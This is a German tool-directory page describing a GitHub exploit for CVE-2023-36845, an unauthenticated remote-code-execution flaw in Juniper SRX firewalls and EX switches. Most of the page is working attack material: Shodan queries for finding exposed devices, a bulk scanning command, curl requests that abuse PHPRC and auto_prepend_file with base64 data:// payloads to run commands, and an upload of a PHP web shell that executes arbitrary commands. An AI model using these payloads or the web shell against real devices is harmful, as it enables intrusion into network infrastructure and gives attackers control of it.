Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Juniper-exploit-CVE-2023-36845 — Exploit für CVE-2023-36845, der nicht authentifizierte Remote-Codeausführung auf Juniper SRX Firewalls und EX Switches ermöglicht, mittels Manipulation von PHP-Umgebungsvariablen, mit Fähigkeiten zur Erkennung und Zustellung von Payloads. | Kitploit
Tools/GitHubGitHub/charondefalt/juniper-exploit-cve-2023-36845
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlPayload-Entwicklung
GitHubcharondefalt/juniper-exploit-cve-2023-36845

Juniper-exploit-CVE-2023-36845

Exploit für CVE-2023-36845, der nicht authentifizierte Remote-Codeausführung auf Juniper SRX Firewalls und EX Switches ermöglicht, mittels Manipulation von PHP-Umgebungsvariablen, mit Fähigkeiten zur Erkennung und Zustellung von Payloads.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 JahrenNoch nicht geprüft

CVE-2023-36845

Beschreibung

CVE-2023-36845 stellt eine bemerkenswerte Schwachstelle in der Manipulation von PHP-Umgebungsvariablen dar, die Juniper SRX Firewalls und EX Switches betrifft. Obwohl Juniper diese Schwachstelle als mittelschwer eingestuft hat, werden wir in diesem Artikel erläutern, wie diese einzelne Schwachstelle für entfernte, nicht authentifizierte Codeausführung genutzt werden kann.

Suche - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
Bild
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
Bild

Verwendung 🛠

Erkennung

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

Option 1

Die Verwendung eines beliebigen Protokoll-Wrappers in Verbindung mit auto_prepend_file ist möglich. Die geeignetste Wahl für diesen Vorgang ist das data://-Protokoll, das die Bereitstellung der „Sekundärdatei“ inline ermöglicht. Hier ist eine anspruchsvolle Darstellung dieses Exploits, der das eingebettete <? phpinfo(); ?> innerhalb des data://-Schemas ausführt:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

Führen Sie den Befehl whoami aus

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

Option 2

Eine Datei hochladen

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

Parameter 🧰

ParameterBeschreibungTyp
--file / -fEingabedatei mit ZielenDatei
-oAusgabedateiDatei
Tool herunterladen